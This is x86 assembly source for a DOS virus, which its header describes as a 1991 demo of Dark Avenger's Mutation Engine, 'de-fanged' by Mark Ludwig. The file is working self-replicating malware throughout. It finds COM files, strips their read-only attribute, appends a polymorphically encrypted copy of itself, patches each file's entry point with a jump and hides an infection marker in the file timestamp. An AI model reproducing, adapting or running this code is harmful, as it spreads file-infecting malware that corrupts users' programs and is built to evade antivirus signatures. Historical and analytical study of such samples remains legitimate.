; This is a demo virus to demonstrate
;   the Mutation Engine <tm> usage

; Version 1.01 (26-10-91)
; (C) 1991 Dark Avenger.

; De-Fanged for experimentation by Mark Ludwig 3/24/93

        .model  tiny
        .radix  16
        .code

        extrn   mut_engine: near, rnd_get: near, rnd_init: near
        extrn   rnd_buf: word, data_top: near

        org     100

start:
        call    locadr
locadr:
        pop     dx
        mov     cl,4
        shr     dx,cl
        sub     dx,10
        mov     cx,ds
        add     cx,dx                   ;Calculate new CS
        mov     dx,offset begin
        push    cx dx
        retf
begin:
        cld
        mov     di,offset start
        push    es di
        push    cs
        pop     ds
        push    ax
        mov     dx,offset dta_buf       ;Set DTA
        mov     ah,1a
        int     21
        xor     ax,ax                   ;Initialize random seed
        mov     [rnd_buf],ax
        call    rnd_init
        mov     dx,offset srchnam
        mov     cl,3
        mov     ah,4e
find_lup:
        int     21                      ;Find the next COM file
        jc      infect_done
        call    isinf                   ;see if infected
        jnz     infect                  ;If not infected, infect it now
find_nxt:
        mov     dx,offset dta_buf
        mov     ah,4f
        jmp     find_lup
infect_done:
        push    cs
        pop     ds
        push    ss
        pop     es
        mov     di,offset start
        mov     si,offset oold_cod
        movsw                           ;Restore first 12 bytes
        movsw
        movsw
        movsw
        movsw
        movsw
        push    ss
        pop     ds
        mov     dx,80                   ;Restore DTA
        mov     ah,1a
        int     21
        pop     ax
        retf

infect:
        xor     cx,cx                   ;Reset read-only attribute
        mov     dx,offset dta_buf+1e
        mov     ax,4301
        int     21
        jc      infect_done
        mov     ax,3d02                 ;Open the file
        int     21
        jc      infect_done
        xchg    ax,bx
        mov     ax,WORD PTR [old_cod]
        mov     WORD PTR [oold_cod],ax
        mov     ax,WORD PTR [old_cod+2]
        mov     WORD PTR [oold_cod+2],ax
        mov     ax,WORD PTR [old_cod+4]
        mov     WORD PTR [oold_cod+4],ax
        mov     ax,WORD PTR [old_cod+6]
        mov     WORD PTR [oold_cod+6],ax
        mov     ax,WORD PTR [old_cod+8]
        mov     WORD PTR [oold_cod+8],ax
        mov     ax,WORD PTR [old_cod+0A]
        mov     WORD PTR [oold_cod+0A],ax
        mov     dx,offset old_cod       ;Read first 12 bytes
        mov     cx,0C
        mov     ah,3f
        int     21
        jc      read_done
        xor     cx,cx                   ;Seek at EOF
        xor     dx,dx
        mov     ax,4202
        int     21
        test    dx,dx                   ;Make sure the file is not too big
        jnz     read_done
        cmp     ax,-2000
        jnc     read_done
        mov     bp,ax
        sub     ax,7
        mov     word ptr [new_cod+5],ax
        mov     ax,cs
        add     ax,1000H
        mov     es,ax
        mov     dx,offset start
        mov     cx,offset _DATA
        push    bp bx
        add     bp,dx
        xor     si,si
        xor     di,di
        mov     bl,0f
        mov     ax,101
        call    mut_engine
        mov     di,dx
        pop     bx ax
        add     ax,cx                   ;Make sure file length mod 256 = 0
        neg     ax
        xor     ah,ah
        add     cx,ax
        mov     ah,40                   ;Put the virus into the file
        int     21
        push    cs
        pop     ds
        jc      write_done
        sub     cx,ax
        jnz     write_done
        xor     dx,dx                   ;Put the JMP instruction
        mov     ax,4200
        int     21
        mov     dx,offset new_cod
        mov     cx,0C
        mov     ah,40
        int     21
        jmp     write_done
read_done:
        mov     ah,3e                   ;close the file
        int     21
        jmp     infect_done
write_done:
        mov     ax,5700H                        ;get date & time on file
        int     21H
        push    dx
        mov     ax,cx                           ;fix it
        xor     ax,dx
        mov     cx,0A
        xor     dx,dx
        div     cx
        mul     cx
        add     ax,3
        pop     dx
        xor     ax,dx
        mov     cx,ax
        mov     ax,5701H                        ;and save it
        int     21H
        jmp     read_done

;determine if file is infected
isinf:
        mov     dx,offset dta_buf+1e
        mov     ax,3d02                 ;Open the file
        int     21
        mov     bx,ax
        mov     ax,5700H                        ;get file attribute
        int     21H
        mov     ax,cx
        xor     ax,dx                           ;date xor time mod 10 = 3 for infected file
        xor     dx,dx
        mov     cx,0A
        div     cx
        cmp     dx,3
        pushf
        mov     ah,3e                   ;Close the file
        int     21
        popf
        ret

srchnam db      '*.COM',0

old_cod:                                ;Buffer to read first 11 bytes
        ret
        db      0
        dw      0,0,0,0,0


oold_cod:                               ;old old code
        db      0,0,0,0,0,0,0,0,0,0,0,0

new_cod:                                ;Buffer to write first 11 bytes
        call    nc2
nc1:    pop     ax
        jmp     $+200
nc2:    pop     ax
        call    nc1
        nop

        .data

dta_buf db      2bh dup(?)              ;Buffer for DTA

        end     start